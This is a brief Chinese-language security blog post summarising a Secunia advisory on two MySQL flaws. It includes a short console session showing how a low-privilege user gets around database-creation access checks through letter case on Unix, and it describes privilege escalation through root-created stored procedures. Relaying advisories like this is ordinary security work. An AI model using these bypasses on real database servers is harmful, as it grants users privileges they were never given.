5up3rh3i'blog［提供有偿web代码安全审计服务］

版权声明：转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://superhei.blogbus.com/logs/3081073.html

http://secunia.com/advisories/21506/print/发布了mysql的2个新漏洞

1.http://bugs.mysql.com/bug.php?id=17647
测试：
$ mysql -h my.mysql.server -u sample -p -A sample
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 263935 to server version: 4.1.16-standard

mysql> create database another;
ERROR 1044: Access denied for user 'sample'@'%' to database 'another'

mysql> create database sAmple; 
Query OK, 1 row affected (0.00 sec)

利用了unix的区别大小写的这个特性，所以在win下是没有的 :)

2.http://bugs.mysql.com/bug.php?id=18630
权限提升，这个好象就是《Hackfing in Mysql5》里提到的
“b、跨权限
存储过程是继承创建者的权限的，如果存储过程是root创建的，当其他普通用户使用这个存储过程时，导致跨权限攻击”

http://www.xfocus.net/articles/200601/847.html